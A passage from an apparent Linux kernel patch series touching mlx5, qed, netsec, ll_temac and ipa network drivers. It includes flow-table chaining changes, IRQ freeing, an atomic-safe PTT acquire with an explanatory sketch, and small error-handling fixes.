+- * of prio in the tree.
++static struct fs_node *find_prio_chains_parent(struct fs_node *parent,
++					       struct fs_node **child)
++{
++	struct fs_node *node = NULL;
++
++	while (parent && parent->type != FS_TYPE_PRIO_CHAINS) {
++		node = parent;
++		parent = parent->parent;
++	}
++
++	if (child)
++		*child = node;
++
++	return parent;
++}
++
++/* If reverse is false then return the first flow table next to the passed node
++ * in the tree, else return the last flow table before the node in the tree.
++ * If skip is true, skip the flow tables in the same prio_chains prio.
+  */
+-static struct mlx5_flow_table *find_closest_ft(struct fs_prio *prio, bool reverse)
++static struct mlx5_flow_table *find_closest_ft(struct fs_node *node, bool reverse,
++					       bool skip)
+ {
++	struct fs_node *prio_chains_parent = NULL;
+ 	struct mlx5_flow_table *ft = NULL;
+ 	struct fs_node *curr_node;
+ 	struct fs_node *parent;
+ 
+-	parent = prio->node.parent;
+-	curr_node = &prio->node;
++	if (skip)
++		prio_chains_parent = find_prio_chains_parent(node, NULL);
++	parent = node->parent;
++	curr_node = node;
+ 	while (!ft && parent) {
+-		ft = find_closest_ft_recursive(parent, &curr_node->list, reverse);
++		if (parent != prio_chains_parent)
++			ft = find_closest_ft_recursive(parent, &curr_node->list,
++						       reverse);
+ 		curr_node = parent;
+ 		parent = curr_node->parent;
+ 	}
+@@ -897,15 +919,15 @@ static struct mlx5_flow_table *find_closest_ft(struct fs_prio *prio, bool revers
+ }
+ 
+ /* Assuming all the tree is locked by mutex chain lock */
+-static struct mlx5_flow_table *find_next_chained_ft(struct fs_prio *prio)
++static struct mlx5_flow_table *find_next_chained_ft(struct fs_node *node)
+ {
+-	return find_closest_ft(prio, false);
++	return find_closest_ft(node, false, true);
+ }
+ 
+ /* Assuming all the tree is locked by mutex chain lock */
+-static struct mlx5_flow_table *find_prev_chained_ft(struct fs_prio *prio)
++static struct mlx5_flow_table *find_prev_chained_ft(struct fs_node *node)
+ {
+-	return find_closest_ft(prio, true);
++	return find_closest_ft(node, true, true);
+ }
+ 
+ static struct mlx5_flow_table *find_next_fwd_ft(struct mlx5_flow_table *ft,
+@@ -917,7 +939,7 @@ static struct mlx5_flow_table *find_next_fwd_ft(struct mlx5_flow_table *ft,
+ 	next_ns = flow_act->action & MLX5_FLOW_CONTEXT_ACTION_FWD_NEXT_NS;
+ 	fs_get_obj(prio, next_ns ? ft->ns->node.parent : ft->node.parent);
+ 
+-	return find_next_chained_ft(prio);
++	return find_next_chained_ft(&prio->node);
+ }
+ 
+ static int connect_fts_in_prio(struct mlx5_core_dev *dev,
+@@ -941,21 +963,55 @@ static int connect_fts_in_prio(struct mlx5_core_dev *dev,
+ 	return 0;
+ }
+ 
++static struct mlx5_flow_table *find_closet_ft_prio_chains(struct fs_node *node,
++							  struct fs_node *parent,
++							  struct fs_node **child,
++							  bool reverse)
++{
++	struct mlx5_flow_table *ft;
++
++	ft = find_closest_ft(node, reverse, false);
++
++	if (ft && parent == find_prio_chains_parent(&ft->node, child))
++		return ft;
++
++	return NULL;
++}
++
+ /* Connect flow tables from previous priority of prio to ft */
+ static int connect_prev_fts(struct mlx5_core_dev *dev,
+ 			    struct mlx5_flow_table *ft,
+ 			    struct fs_prio *prio)
+ {
++	struct fs_node *prio_parent, *parent = NULL, *child, *node;
+ 	struct mlx5_flow_table *prev_ft;
++	int err = 0;
++
++	prio_parent = find_prio_chains_parent(&prio->node, &child);
++
++	/* return directly if not under the first sub ns of prio_chains prio */
++	if (prio_parent && !list_is_first(&child->list, &prio_parent->children))
++		return 0;
+ 
+-	prev_ft = find_prev_chained_ft(prio);
+-	if (prev_ft) {
++	prev_ft = find_prev_chained_ft(&prio->node);
++	while (prev_ft) {
+ 		struct fs_prio *prev_prio;
+ 
+ 		fs_get_obj(prev_prio, prev_ft->node.parent);
+-		return connect_fts_in_prio(dev, prev_prio, ft);
++		err = connect_fts_in_prio(dev, prev_prio, ft);
++		if (err)
++			break;
++
++		if (!parent) {
++			parent = find_prio_chains_parent(&prev_prio->node, &child);
++			if (!parent)
++				break;
++		}
++
++		node = child;
++		prev_ft = find_closet_ft_prio_chains(node, parent, &child, true);
+ 	}
+-	return 0;
++	return err;
+ }
+ 
+ static int update_root_ft_create(struct mlx5_flow_table *ft, struct fs_prio
+@@ -1094,7 +1150,7 @@ static int connect_flow_table(struct mlx5_core_dev *dev, struct mlx5_flow_table
+ 		if (err)
+ 			return err;
+ 
+-		next_ft = first_ft ? first_ft : find_next_chained_ft(prio);
++		next_ft = first_ft ? first_ft : find_next_chained_ft(&prio->node);
+ 		err = connect_fwd_rules(dev, ft, next_ft);
+ 		if (err)
+ 			return err;
+@@ -1169,7 +1225,7 @@ static struct mlx5_flow_table *__mlx5_create_flow_table(struct mlx5_flow_namespa
+ 
+ 	tree_init_node(&ft->node, del_hw_flow_table, del_sw_flow_table);
+ 	next_ft = unmanaged ? ft_attr->next_ft :
+-			      find_next_chained_ft(fs_prio);
++			      find_next_chained_ft(&fs_prio->node);
+ 	ft->def_miss_action = ns->def_miss_action;
+ 	ft->ns = ns;
+ 	err = root->cmds->create_flow_table(root, ft, ft_attr, next_ft);
+@@ -2157,13 +2213,20 @@ EXPORT_SYMBOL(mlx5_del_flow_rules);
+ /* Assuming prio->node.children(flow tables) is sorted by level */
+ static struct mlx5_flow_table *find_next_ft(struct mlx5_flow_table *ft)
+ {
++	struct fs_node *prio_parent, *child;
+ 	struct fs_prio *prio;
+ 
+ 	fs_get_obj(prio, ft->node.parent);
+ 
+ 	if (!list_is_last(&ft->node.list, &prio->node.children))
+ 		return list_next_entry(ft, node.list);
+-	return find_next_chained_ft(prio);
++
++	prio_parent = find_prio_chains_parent(&prio->node, &child);
++
++	if (prio_parent && list_is_first(&child->list, &prio_parent->children))
++		return find_closest_ft(&prio->node, false, false);
++
++	return find_next_chained_ft(&prio->node);
+ }
+ 
+ static int update_root_ft_destroy(struct mlx5_flow_table *ft)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h
+index 23cb63fa45886..2e728e4e81fac 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h
+@@ -14,6 +14,7 @@ int mlx5_irq_table_init(struct mlx5_core_dev *dev);
+ void mlx5_irq_table_cleanup(struct mlx5_core_dev *dev);
+ int mlx5_irq_table_create(struct mlx5_core_dev *dev);
+ void mlx5_irq_table_destroy(struct mlx5_core_dev *dev);
++void mlx5_irq_table_free_irqs(struct mlx5_core_dev *dev);
+ int mlx5_irq_table_get_num_comp(struct mlx5_irq_table *table);
+ int mlx5_irq_table_get_sfs_vec(struct mlx5_irq_table *table);
+ struct mlx5_irq_table *mlx5_irq_table_get(struct mlx5_core_dev *dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+index 662f1d55e30e0..5e0f7d96aac51 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+@@ -591,6 +591,24 @@ static void irq_pools_destroy(struct mlx5_irq_table *table)
+ 	irq_pool_free(table->pf_pool);
+ }
+ 
++static void mlx5_irq_pool_free_irqs(struct mlx5_irq_pool *pool)
++{
++	struct mlx5_irq *irq;
++	unsigned long index;
++
++	xa_for_each(&pool->irqs, index, irq)
++		free_irq(irq->irqn, &irq->nh);
++}
++
++static void mlx5_irq_pools_free_irqs(struct mlx5_irq_table *table)
++{
++	if (table->sf_ctrl_pool) {
++		mlx5_irq_pool_free_irqs(table->sf_comp_pool);
++		mlx5_irq_pool_free_irqs(table->sf_ctrl_pool);
++	}
++	mlx5_irq_pool_free_irqs(table->pf_pool);
++}
++
+ /* irq_table API */
+ 
+ int mlx5_irq_table_init(struct mlx5_core_dev *dev)
+@@ -670,6 +688,17 @@ void mlx5_irq_table_destroy(struct mlx5_core_dev *dev)
+ 	pci_free_irq_vectors(dev->pdev);
+ }
+ 
++void mlx5_irq_table_free_irqs(struct mlx5_core_dev *dev)
++{
++	struct mlx5_irq_table *table = dev->priv.irq_table;
++
++	if (mlx5_core_is_sf(dev))
++		return;
++
++	mlx5_irq_pools_free_irqs(table);
++	pci_free_irq_vectors(dev->pdev);
++}
++
+ int mlx5_irq_table_get_sfs_vec(struct mlx5_irq_table *table)
+ {
+ 	if (table->sf_comp_pool)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+index 84364691a3791..d7b1a230b59e8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+@@ -538,11 +538,12 @@ int mlx5dr_cmd_create_reformat_ctx(struct mlx5_core_dev *mdev,
+ 
+ 	err = mlx5_cmd_exec(mdev, in, inlen, out, sizeof(out));
+ 	if (err)
+-		return err;
++		goto err_free_in;
+ 
+ 	*reformat_id = MLX5_GET(alloc_packet_reformat_context_out, out, packet_reformat_id);
+-	kvfree(in);
+ 
++err_free_in:
++	kvfree(in);
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_dev_api.h b/drivers/net/ethernet/qlogic/qed/qed_dev_api.h
+index f8682356d0cf4..94d4f9413ab7a 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_dev_api.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_dev_api.h
+@@ -193,6 +193,22 @@ void qed_hw_remove(struct qed_dev *cdev);
+  */
+ struct qed_ptt *qed_ptt_acquire(struct qed_hwfn *p_hwfn);
+ 
++/**
++ * qed_ptt_acquire_context(): Allocate a PTT window honoring the context
++ *			      atomicity.
++ *
++ * @p_hwfn: HW device data.
++ * @is_atomic: Hint from the caller - whether the function can sleep or not.
++ *
++ * Context: The function must not sleep when is_atomic == true.
++ * Return: struct qed_ptt pointer, or NULL on failure.
++ *
++ * Should be called at the entry point to the driver
++ * (at the beginning of an exported function).
++ */
++struct qed_ptt *qed_ptt_acquire_context(struct qed_hwfn *p_hwfn,
++					bool is_atomic);
++
+ /**
+  * qed_ptt_release(): Release PTT Window.
+  *
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_fcoe.c b/drivers/net/ethernet/qlogic/qed/qed_fcoe.c
+index 3764190b948eb..04602ac947087 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_fcoe.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_fcoe.c
+@@ -693,13 +693,14 @@ static void _qed_fcoe_get_pstats(struct qed_hwfn *p_hwfn,
+ }
+ 
+ static int qed_fcoe_get_stats(struct qed_hwfn *p_hwfn,
+-			      struct qed_fcoe_stats *p_stats)
++			      struct qed_fcoe_stats *p_stats,
++			      bool is_atomic)
+ {
+ 	struct qed_ptt *p_ptt;
+ 
+ 	memset(p_stats, 0, sizeof(*p_stats));
+ 
+-	p_ptt = qed_ptt_acquire(p_hwfn);
++	p_ptt = qed_ptt_acquire_context(p_hwfn, is_atomic);
+ 
+ 	if (!p_ptt) {
+ 		DP_ERR(p_hwfn, "Failed to acquire ptt\n");
+@@ -973,19 +974,27 @@ static int qed_fcoe_destroy_conn(struct qed_dev *cdev,
+ 					QED_SPQ_MODE_EBLOCK, NULL);
+ }
+ 
++static int qed_fcoe_stats_context(struct qed_dev *cdev,
++				  struct qed_fcoe_stats *stats,
++				  bool is_atomic)
++{
++	return qed_fcoe_get_stats(QED_AFFIN_HWFN(cdev), stats, is_atomic);
++}
++
+ static int qed_fcoe_stats(struct qed_dev *cdev, struct qed_fcoe_stats *stats)
+ {
+-	return qed_fcoe_get_stats(QED_AFFIN_HWFN(cdev), stats);
++	return qed_fcoe_stats_context(cdev, stats, false);
+ }
+ 
+ void qed_get_protocol_stats_fcoe(struct qed_dev *cdev,
+-				 struct qed_mcp_fcoe_stats *stats)
++				 struct qed_mcp_fcoe_stats *stats,
++				 bool is_atomic)
+ {
+ 	struct qed_fcoe_stats proto_stats;
+ 
+ 	/* Retrieve FW statistics */
+ 	memset(&proto_stats, 0, sizeof(proto_stats));
+-	if (qed_fcoe_stats(cdev, &proto_stats)) {
++	if (qed_fcoe_stats_context(cdev, &proto_stats, is_atomic)) {
+ 		DP_VERBOSE(cdev, QED_MSG_STORAGE,
+ 			   "Failed to collect FCoE statistics\n");
+ 		return;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_fcoe.h b/drivers/net/ethernet/qlogic/qed/qed_fcoe.h
+index 19c85adf4ceb1..214e8299ecb4e 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_fcoe.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_fcoe.h
+@@ -28,8 +28,20 @@ int qed_fcoe_alloc(struct qed_hwfn *p_hwfn);
+ void qed_fcoe_setup(struct qed_hwfn *p_hwfn);
+ 
+ void qed_fcoe_free(struct qed_hwfn *p_hwfn);
++/**
++ * qed_get_protocol_stats_fcoe(): Fills provided statistics
++ *				  struct with statistics.
++ *
++ * @cdev: Qed dev pointer.
++ * @stats: Points to struct that will be filled with statistics.
++ * @is_atomic: Hint from the caller - whether the function can sleep or not.
++ *
++ * Context: The function must not sleep when is_atomic == true.
++ * Return: Void.
++ */
+ void qed_get_protocol_stats_fcoe(struct qed_dev *cdev,
+-				 struct qed_mcp_fcoe_stats *stats);
++				 struct qed_mcp_fcoe_stats *stats,
++				 bool is_atomic);
+ #else /* CONFIG_QED_FCOE */
+ static inline int qed_fcoe_alloc(struct qed_hwfn *p_hwfn)
+ {
+@@ -40,7 +52,8 @@ static inline void qed_fcoe_setup(struct qed_hwfn *p_hwfn) {}
+ static inline void qed_fcoe_free(struct qed_hwfn *p_hwfn) {}
+ 
+ static inline void qed_get_protocol_stats_fcoe(struct qed_dev *cdev,
+-					       struct qed_mcp_fcoe_stats *stats)
++					       struct qed_mcp_fcoe_stats *stats,
++					       bool is_atomic)
+ {
+ }
+ #endif /* CONFIG_QED_FCOE */
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_hw.c b/drivers/net/ethernet/qlogic/qed/qed_hw.c
+index 554f30b0cfd5e..6263f847b6b92 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_hw.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_hw.c
+@@ -23,7 +23,10 @@
+ #include "qed_reg_addr.h"
+ #include "qed_sriov.h"
+ 
+-#define QED_BAR_ACQUIRE_TIMEOUT 1000
++#define QED_BAR_ACQUIRE_TIMEOUT_USLEEP_CNT	1000
++#define QED_BAR_ACQUIRE_TIMEOUT_USLEEP		1000
++#define QED_BAR_ACQUIRE_TIMEOUT_UDELAY_CNT	100000
++#define QED_BAR_ACQUIRE_TIMEOUT_UDELAY		10
+ 
+ /* Invalid values */
+ #define QED_BAR_INVALID_OFFSET          (cpu_to_le32(-1))
+@@ -84,12 +87,22 @@ void qed_ptt_pool_free(struct qed_hwfn *p_hwfn)
+ }
+ 
+ struct qed_ptt *qed_ptt_acquire(struct qed_hwfn *p_hwfn)
++{
++	return qed_ptt_acquire_context(p_hwfn, false);
++}
++
++struct qed_ptt *qed_ptt_acquire_context(struct qed_hwfn *p_hwfn, bool is_atomic)
+ {
+ 	struct qed_ptt *p_ptt;
+-	unsigned int i;
++	unsigned int i, count;
++
++	if (is_atomic)
++		count = QED_BAR_ACQUIRE_TIMEOUT_UDELAY_CNT;
++	else
++		count = QED_BAR_ACQUIRE_TIMEOUT_USLEEP_CNT;
+ 
+ 	/* Take the free PTT from the list */
+-	for (i = 0; i < QED_BAR_ACQUIRE_TIMEOUT; i++) {
++	for (i = 0; i < count; i++) {
+ 		spin_lock_bh(&p_hwfn->p_ptt_pool->lock);
+ 
+ 		if (!list_empty(&p_hwfn->p_ptt_pool->free_list)) {
+@@ -105,7 +118,12 @@ struct qed_ptt *qed_ptt_acquire(struct qed_hwfn *p_hwfn)
+ 		}
+ 
+ 		spin_unlock_bh(&p_hwfn->p_ptt_pool->lock);
+-		usleep_range(1000, 2000);
++
++		if (is_atomic)
++			udelay(QED_BAR_ACQUIRE_TIMEOUT_UDELAY);
++		else
++			usleep_range(QED_BAR_ACQUIRE_TIMEOUT_USLEEP,
++				     QED_BAR_ACQUIRE_TIMEOUT_USLEEP * 2);
+ 	}
+ 
+ 	DP_NOTICE(p_hwfn, "PTT acquire timeout - failed to allocate PTT\n");
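
The qed_ptt_acquire_context() kernel-doc and the hunk above implement a
context-aware poll: atomic callers spin briefly with udelay(), everyone
else yields with usleep_range(), and the iteration counts are scaled so
both variants wait roughly the same total time (100000 * 10us versus
1000 * 1000us, about one second either way). The shape of the loop,
condensed (a sketch; try_take_ptt() is an illustrative stand-in for the
locked free-list pop):

	count = is_atomic ? QED_BAR_ACQUIRE_TIMEOUT_UDELAY_CNT
			  : QED_BAR_ACQUIRE_TIMEOUT_USLEEP_CNT;
	for (i = 0; i < count; i++) {
		p_ptt = try_take_ptt(p_hwfn);	/* illustrative helper */
		if (p_ptt)
			return p_ptt;
		if (is_atomic)
			udelay(QED_BAR_ACQUIRE_TIMEOUT_UDELAY);	/* no sleeping */
		else
			usleep_range(QED_BAR_ACQUIRE_TIMEOUT_USLEEP,
				     QED_BAR_ACQUIRE_TIMEOUT_USLEEP * 2);
	}
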
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_iscsi.c b/drivers/net/ethernet/qlogic/qed/qed_iscsi.c
+index 511ab214eb9c8..980e7289b4814 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_iscsi.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_iscsi.c
+@@ -999,13 +999,14 @@ static void _qed_iscsi_get_pstats(struct qed_hwfn *p_hwfn,
+ }
+ 
+ static int qed_iscsi_get_stats(struct qed_hwfn *p_hwfn,
+-			       struct qed_iscsi_stats *stats)
++			       struct qed_iscsi_stats *stats,
++			       bool is_atomic)
+ {
+ 	struct qed_ptt *p_ptt;
+ 
+ 	memset(stats, 0, sizeof(*stats));
+ 
+-	p_ptt = qed_ptt_acquire(p_hwfn);
++	p_ptt = qed_ptt_acquire_context(p_hwfn, is_atomic);
+ 	if (!p_ptt) {
+ 		DP_ERR(p_hwfn, "Failed to acquire ptt\n");
+ 		return -EAGAIN;
+@@ -1336,9 +1337,16 @@ static int qed_iscsi_destroy_conn(struct qed_dev *cdev,
+ 					   QED_SPQ_MODE_EBLOCK, NULL);
+ }
+ 
++static int qed_iscsi_stats_context(struct qed_dev *cdev,
++				   struct qed_iscsi_stats *stats,
++				   bool is_atomic)
++{
++	return qed_iscsi_get_stats(QED_AFFIN_HWFN(cdev), stats, is_atomic);
++}
++
+ static int qed_iscsi_stats(struct qed_dev *cdev, struct qed_iscsi_stats *stats)
+ {
+-	return qed_iscsi_get_stats(QED_AFFIN_HWFN(cdev), stats);
++	return qed_iscsi_stats_context(cdev, stats, false);
+ }
+ 
+ static int qed_iscsi_change_mac(struct qed_dev *cdev,
+@@ -1358,13 +1366,14 @@ static int qed_iscsi_change_mac(struct qed_dev *cdev,
+ }
+ 
+ void qed_get_protocol_stats_iscsi(struct qed_dev *cdev,
+-				  struct qed_mcp_iscsi_stats *stats)
++				  struct qed_mcp_iscsi_stats *stats,
++				  bool is_atomic)
+ {
+ 	struct qed_iscsi_stats proto_stats;
+ 
+ 	/* Retrieve FW statistics */
+ 	memset(&proto_stats, 0, sizeof(proto_stats));
+-	if (qed_iscsi_stats(cdev, &proto_stats)) {
++	if (qed_iscsi_stats_context(cdev, &proto_stats, is_atomic)) {
+ 		DP_VERBOSE(cdev, QED_MSG_STORAGE,
+ 			   "Failed to collect ISCSI statistics\n");
+ 		return;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_iscsi.h b/drivers/net/ethernet/qlogic/qed/qed_iscsi.h
+index dec2b00259d42..974cb8d26608c 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_iscsi.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_iscsi.h
+@@ -39,11 +39,14 @@ void qed_iscsi_free(struct qed_hwfn *p_hwfn);
+  *
+  * @cdev: Qed dev pointer.
+  * @stats: Points to struct that will be filled with statistics.
++ * @is_atomic: Hint from the caller - whether the function can sleep or not.
+  *
++ * Context: The function must not sleep when is_atomic == true.
+  * Return: Void.
+  */
+ void qed_get_protocol_stats_iscsi(struct qed_dev *cdev,
+-				  struct qed_mcp_iscsi_stats *stats);
++				  struct qed_mcp_iscsi_stats *stats,
++				  bool is_atomic);
+ #else /* IS_ENABLED(CONFIG_QED_ISCSI) */
+ static inline int qed_iscsi_alloc(struct qed_hwfn *p_hwfn)
+ {
+@@ -56,7 +59,8 @@ static inline void qed_iscsi_free(struct qed_hwfn *p_hwfn) {}
+ 
+ static inline void
+ qed_get_protocol_stats_iscsi(struct qed_dev *cdev,
+-			     struct qed_mcp_iscsi_stats *stats) {}
++			     struct qed_mcp_iscsi_stats *stats,
++			     bool is_atomic) {}
+ #endif /* IS_ENABLED(CONFIG_QED_ISCSI) */
+ 
+ #endif
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_l2.c b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+index 7776d3bdd459a..970b9aabbc3d7 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_l2.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+@@ -1863,7 +1863,8 @@ static void __qed_get_vport_stats(struct qed_hwfn *p_hwfn,
+ }
+ 
+ static void _qed_get_vport_stats(struct qed_dev *cdev,
+-				 struct qed_eth_stats *stats)
++				 struct qed_eth_stats *stats,
++				 bool is_atomic)
+ {
+ 	u8 fw_vport = 0;
+ 	int i;
+@@ -1872,10 +1873,11 @@ static void _qed_get_vport_stats(struct qed_dev *cdev,
+ 
+ 	for_each_hwfn(cdev, i) {
+ 		struct qed_hwfn *p_hwfn = &cdev->hwfns[i];
+-		struct qed_ptt *p_ptt = IS_PF(cdev) ? qed_ptt_acquire(p_hwfn)
+-						    :  NULL;
++		struct qed_ptt *p_ptt;
+ 		bool b_get_port_stats;
+ 
++		p_ptt = IS_PF(cdev) ? qed_ptt_acquire_context(p_hwfn, is_atomic)
++				    : NULL;
+ 		if (IS_PF(cdev)) {
+ 			/* The main vport index is relative first */
+ 			if (qed_fw_vport(p_hwfn, 0, &fw_vport)) {
+@@ -1900,6 +1902,13 @@ out:
+ }
+ 
+ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats)
++{
++	qed_get_vport_stats_context(cdev, stats, false);
++}
++
++void qed_get_vport_stats_context(struct qed_dev *cdev,
++				 struct qed_eth_stats *stats,
++				 bool is_atomic)
+ {
+ 	u32 i;
+ 
+@@ -1908,7 +1917,7 @@ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats)
+ 		return;
+ 	}
+ 
+-	_qed_get_vport_stats(cdev, stats);
++	_qed_get_vport_stats(cdev, stats, is_atomic);
+ 
+ 	if (!cdev->reset_stats)
+ 		return;
+@@ -1960,7 +1969,7 @@ void qed_reset_vport_stats(struct qed_dev *cdev)
+ 	if (!cdev->reset_stats) {
+ 		DP_INFO(cdev, "Reset stats not allocated\n");
+ 	} else {
+-		_qed_get_vport_stats(cdev, cdev->reset_stats);
++		_qed_get_vport_stats(cdev, cdev->reset_stats, false);
+ 		cdev->reset_stats->common.link_change_count = 0;
+ 	}
+ }
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_l2.h b/drivers/net/ethernet/qlogic/qed/qed_l2.h
+index a538cf478c14e..2d2f82c785ad2 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_l2.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_l2.h
+@@ -249,8 +249,32 @@ qed_sp_eth_rx_queues_update(struct qed_hwfn *p_hwfn,
+ 			    enum spq_mode comp_mode,
+ 			    struct qed_spq_comp_cb *p_comp_data);
+ 
++/**
++ * qed_get_vport_stats(): Fills provided statistics
++ *			  struct with statistics.
++ *
++ * @cdev: Qed dev pointer.
++ * @stats: Points to struct that will be filled with statistics.
++ *
++ * Return: Void.
++ */
+ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats);
+ 
++/**
++ * qed_get_vport_stats_context(): Fills provided statistics
++ *				  struct with statistics.
++ *
++ * @cdev: Qed dev pointer.
++ * @stats: Points to struct that will be filled with statistics.
++ * @is_atomic: Hint from the caller - whether the function can sleep or not.
++ *
++ * Context: The function must not sleep when is_atomic == true.
++ * Return: Void.
++ */
++void qed_get_vport_stats_context(struct qed_dev *cdev,
++				 struct qed_eth_stats *stats,
++				 bool is_atomic);
++
+ void qed_reset_vport_stats(struct qed_dev *cdev);
+ 
+ /**
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_main.c b/drivers/net/ethernet/qlogic/qed/qed_main.c
+index c91898be7c030..25d9c254288b5 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_main.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_main.c
+@@ -3101,7 +3101,7 @@ void qed_get_protocol_stats(struct qed_dev *cdev,
+ 
+ 	switch (type) {
+ 	case QED_MCP_LAN_STATS:
+-		qed_get_vport_stats(cdev, &eth_stats);
++		qed_get_vport_stats_context(cdev, &eth_stats, true);
+ 		stats->lan_stats.ucast_rx_pkts =
+ 					eth_stats.common.rx_ucast_pkts;
+ 		stats->lan_stats.ucast_tx_pkts =
+@@ -3109,10 +3109,10 @@ void qed_get_protocol_stats(struct qed_dev *cdev,
+ 		stats->lan_stats.fcs_err = -1;
+ 		break;
+ 	case QED_MCP_FCOE_STATS:
+-		qed_get_protocol_stats_fcoe(cdev, &stats->fcoe_stats);
++		qed_get_protocol_stats_fcoe(cdev, &stats->fcoe_stats, true);
+ 		break;
+ 	case QED_MCP_ISCSI_STATS:
+-		qed_get_protocol_stats_iscsi(cdev, &stats->iscsi_stats);
++		qed_get_protocol_stats_iscsi(cdev, &stats->iscsi_stats, true);
+ 		break;
+ 	default:
+ 		DP_VERBOSE(cdev, QED_MSG_SP,
+diff --git a/drivers/net/ethernet/socionext/netsec.c b/drivers/net/ethernet/socionext/netsec.c
+index 9b46579b5a103..b130e978366c1 100644
+--- a/drivers/net/ethernet/socionext/netsec.c
++++ b/drivers/net/ethernet/socionext/netsec.c
+@@ -1851,6 +1851,17 @@ static int netsec_of_probe(struct platform_device *pdev,
+ 		return err;
+ 	}
+ 
++	/*
++	 * SynQuacer is physically configured with TX and RX delays
++	 * but the standard firmware claimed otherwise for a long
++	 * time; ignore it.
++	 */
++	if (of_machine_is_compatible("socionext,developer-box") &&
++	    priv->phy_interface != PHY_INTERFACE_MODE_RGMII_ID) {
++		dev_warn(&pdev->dev, "Outdated firmware reports incorrect PHY mode, overriding\n");
++		priv->phy_interface = PHY_INTERFACE_MODE_RGMII_ID;
++	}
++
+ 	priv->phy_np = of_parse_phandle(pdev->dev.of_node, "phy-handle", 0);
+ 	if (!priv->phy_np) {
+ 		dev_err(&pdev->dev, "missing required property 'phy-handle'\n");
+diff --git a/drivers/net/ethernet/xilinx/ll_temac_main.c b/drivers/net/ethernet/xilinx/ll_temac_main.c
+index 1066420d6a83a..6bf5e341c3c11 100644
+--- a/drivers/net/ethernet/xilinx/ll_temac_main.c
++++ b/drivers/net/ethernet/xilinx/ll_temac_main.c
+@@ -1568,12 +1568,16 @@ static int temac_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* Error handle returned DMA RX and TX interrupts */
+-	if (lp->rx_irq < 0)
+-		return dev_err_probe(&pdev->dev, lp->rx_irq,
++	if (lp->rx_irq <= 0) {
++		rc = lp->rx_irq ?: -EINVAL;
++		return dev_err_probe(&pdev->dev, rc,
+ 				     "could not get DMA RX irq\n");
+-	if (lp->tx_irq < 0)
+-		return dev_err_probe(&pdev->dev, lp->tx_irq,
++	}
++	if (lp->tx_irq <= 0) {
++		rc = lp->tx_irq ?: -EINVAL;
++		return dev_err_probe(&pdev->dev, rc,
+ 				     "could not get DMA TX irq\n");
++	}
+ 
+ 	if (temac_np) {
+ 		/* Retrieve the MAC address */
+diff --git a/drivers/net/ipa/ipa_table.c b/drivers/net/ipa/ipa_table.c
+index 510ff2dc8999a..cd81dd916c29e 100644
+--- a/drivers/net/ipa/ipa_table.c
++++ b/drivers/net/ipa/ipa_table.c
+@@ -311,16 +311,15 @@ static int ipa_filter_reset(struct ipa *ipa, bool modem)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ipa_filter_reset_table(ipa, IPA_MEM_V4_FILTER_HASHED, modem);
+-	if (ret)
++	ret = ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER, modem);
++	if (ret || !ipa_table_hash_support(ipa))
+ 		return ret;
+ 
+-	ret = ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER, modem);
++	ret = ipa_filter_reset_table(ipa, IPA_MEM_V4_FILTER_HASHED, modem);
+ 	if (ret)
+ 		return ret;
+-	ret = ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER_HASHED, modem);
+ 
+-	return ret;
++	return ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER_HASHED, modem);
+ }
+ 
+ /* The AP routes and modem routes are each contiguous within the
+@@ -329,11 +328,12 @@ static int ipa_filter_reset(struct ipa *ipa, bool modem)
+  * */
+ static int ipa_route_reset(struct ipa *ipa, bool modem)
+ {
++	bool hash_support = ipa_table_hash_support(ipa);
+ 	struct gsi_trans *trans;
+ 	u16 first;
+ 	u16 count;
+ 
+-	trans = ipa_cmd_trans_alloc(ipa, 4);
++	trans = ipa_cmd_trans_alloc(ipa, hash_support ? 4 : 2);
+ 	if (!trans) {
